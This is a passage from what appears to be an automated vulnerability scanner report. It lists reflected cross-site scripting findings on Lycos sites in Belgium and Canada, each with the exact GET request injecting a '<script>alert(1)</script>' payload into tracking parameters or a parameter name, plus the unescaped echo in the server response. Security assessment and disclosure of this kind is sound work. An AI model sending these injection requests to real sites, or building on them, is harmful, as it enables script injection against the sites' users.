<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?c3ee9"><script>alert(1)</script>5cb537d5b45=1&diktfc=97E5EB835B279BB13FE34B032A5C9AC1EFCA968FE872&mobile=1">
...[SNIP]...

1.304. http://www.lycos.be/ [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.be
Path:   /

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a857c"><script>alert(1)</script>736e3f921fe was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome&utm_campaign=home_flagsa857c"><script>alert(1)</script>736e3f921fe&utm_medium=footer HTTP/1.1
Host: www.lycos.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839836492; path=/
Date: Mon, 07 Feb 2011 14:52:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome&utm_campaign=home_flagsa857c"><script>alert(1)</script>736e3f921fe&utm_medium=footer&diktfc=623DAA5AA63790B00C336C9EA20D19C6CCF52C9D1345&mobile=1">
...[SNIP]...

1.305. http://www.lycos.be/ [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.be
Path:   /

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e80"><script>alert(1)</script>e545848e758 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerd1e80"><script>alert(1)</script>e545848e758 HTTP/1.1
Host: www.lycos.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161729042; path=/
Date: Mon, 07 Feb 2011 14:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:44 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerd1e80"><script>alert(1)</script>e545848e758&diktfc=B40089EC36E5DAC56A7BB40F7A2916D2885AE607D69F&mobile=1">
...[SNIP]...

1.306. http://www.lycos.be/ [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.be
Path:   /

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d00a2"><script>alert(1)</script>8120a6d457e was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshomed00a2"><script>alert(1)</script>8120a6d457e&utm_campaign=home_flags&utm_medium=footer HTTP/1.1
Host: www.lycos.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839804911; path=/
Date: Mon, 07 Feb 2011 14:52:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshomed00a2"><script>alert(1)</script>8120a6d457e&utm_campaign=home_flags&utm_medium=footer&diktfc=BBA1BC2FA21FEDA918DBB104CC41AFAF4F849834F42E&mobile=1">
...[SNIP]...

1.307. http://www.lycos.ca/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.ca
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f7ab"><script>alert(1)</script>4d893273fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?2f7ab"><script>alert(1)</script>4d893273fa2=1 HTTP/1.1
Host: www.lycos.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839802733; path=/
Date: Mon, 07 Feb 2011 14:52:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.